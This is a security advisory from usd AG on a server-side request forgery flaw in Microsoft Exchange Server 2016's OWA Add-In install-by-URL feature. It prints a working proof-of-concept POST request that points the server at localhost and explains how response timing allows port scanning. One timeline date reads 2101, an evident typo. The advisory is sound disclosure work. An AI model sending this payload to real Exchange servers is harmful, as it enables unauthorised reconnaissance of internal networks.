usd-2021-0021 | Microsoft Exchange Server OWA

Advisory ID: usd20210021
Affected Product: Microsoft Exchange Server 
Affected Version: Latest (Exchange Server 2016, Version 15.1 (Build 2242.4))
Vulnerability Type: CWE-918: Server-Side Request Forgery (SSRF) 
Security Risk: Medium
Vendor URL: https://microsoft.com 
Vendor Status: Not fixed / Disputed

The following behavior was reported to Microsoft in May 2021. After finishing their investigations, Microsoft informed us that this issue does not meet their bar for servicing in a security update. However, they will be fixing it in a future version.

Description

The application can be made to perform requests to other services. From the perspective of those other services it looks like the requests originated from the vulnerable application. By issuing such server-side requests, an attacker may be able to access services that are bound to the local interface of the vulnerable system and would therefore normally not be reachable over the network. In addition, an SSRF attack can provide access to the local network in which the server is located.

The Exchange Server’s OWA component allows to manage Add-Ins. In doing so, users may install Add-ins using multiple mechanisms, including installation by URL. The Exchange Server does not sufficiently validate the provided URL, resulting in SSRF to localhost.

Proof of Concept (PoC)

The following request aims to add a new Add-In by URL:

POST /owa/service.svc?action=NewApp&EP=1&ID=-111&AC=1 HTTP/1.1
Host: mail.example.com
Connection: close
Content-Length: 0
X-OWA-CANARY: dw6RrSW5xkeohY7IO6eScYBwLs2gC9kIomQo6IaQazVuNzOfEdnWOkdAizP_HzwRWj3HoqnG11A.
X-OWA-ActionId: -111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
client-request-id: 5E41776E617341E7972F258E1E6F4D9B_161977115997179
X-OWA-UrlPostData: %7B%22__type%22%3A%22NewAppDataRequest%3A%23Exchange%22%2C%22Header%22%3A%7B%22__type%22%3A%22JsonRequestHeaders%3A%23Exchange%22%2C%22RequestServerVersion%22%3A%22Exchange2013%22%2C%22TimeZoneContext%22%3A%7B%22__type%22%3A%22TimeZoneContext%3A%23Exchange%22%2C%22TimeZoneDefinition%22%3A%7B%22__type%22%3A%22TimeZoneDefinitionType%3A%23Exchange%22%2C%22Id%22%3A%22W.%20Europe%20Standard%20Time%22%7D%7D%7D%2C%22AppInfo%22%3A%7B%22__type%22%3A%22NewAppInfo%3A%23Exchange%22%2C%22DownloadOnly%22%3Atrue%2C%22Url%22%3A%22http%3A%2F%2Flocalhost%3A81%22%7D%7D
X-Requested-With: XMLHttpRequest
Action: NewApp
X-OWA-ActionName: NewAppAction
X-OWA-ClientBuildVersion: 15.1.2176.12
X-OWA-CorrelationId: 5E41776E617341E7972F258E1E6F4D9B_161977115997179
Content-Type: application/json; charset=UTF-8
X-OWA-ClientBegin: 2021-04-30T08:25:59.971
X-OWA-Attempt: 1
Origin: https://mail.example.com
Cookie: [REDACTED]
[...]

The X-OWA-UrlPostData header could be decoded to the following:

{"__type":"NewAppDataRequest:#Exchange","Header":{"__type":"JsonRequestHeaders:#Exchange","RequestServerVersion":"Exchange2013","TimeZoneContext":{"__type":"TimeZoneContext:#Exchange","TimeZoneDefinition":{"__type":"TimeZoneDefinitionType:#Exchange","Id":"W. Europe Standard Time"}}},"AppInfo":{"__type":"NewAppInfo:#Exchange","DownloadOnly":true,"Url":"http://localhost:81"}}

By testing multiple ports at localhost as Url parameter, clear timing differences can be observed:

A malicious actor could utilize these different response times to perform port scans of localhost or the local network.

Fix

It is recommended to evaluate the need to make server-side requests. If server-side requests are absolutely necessary, the corresponding function should be restricted by a whitelisting approach.

References

Timeline

  • 2021-05-03: This vulnerability was identified by Lauritz Holtmann.
  • 2101-05-07: Advisory submitted to vendor via e-mail.
  • 2021-05-25: Vendor states that they will be fixing this issue in a future version.
  • 2021-06-30: Security advisory released by usd AG.

Credits

This security vulnerability was found by Lauritz Holtmann of usd AG.

ABOUT usd SECURITY ADVISORIES

In order to protect businesses against hackers and criminals, we always have to keep our skills and knowledge up to date. Thus, security research is just as important for our work as is building up a security community to promote the exchange of knowledge. After all, more security can only be achieved if many individuals take on the task.

Our CST Academy and our usd HeroLab are essential parts of our security mission. We share the knowledge we gain in our practical work and our research through training courses and publications. In this context, the usd HeroLab publishes a series of papers on new vulnerabilities and current security issues.

Always for the sake of our mission: „more security.“

to usd AG


In accordance with usd AG’s Responsible Disclosure Policy, all vendors have been notified of the existence of these vulnerabilities.

Disclaimer

The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.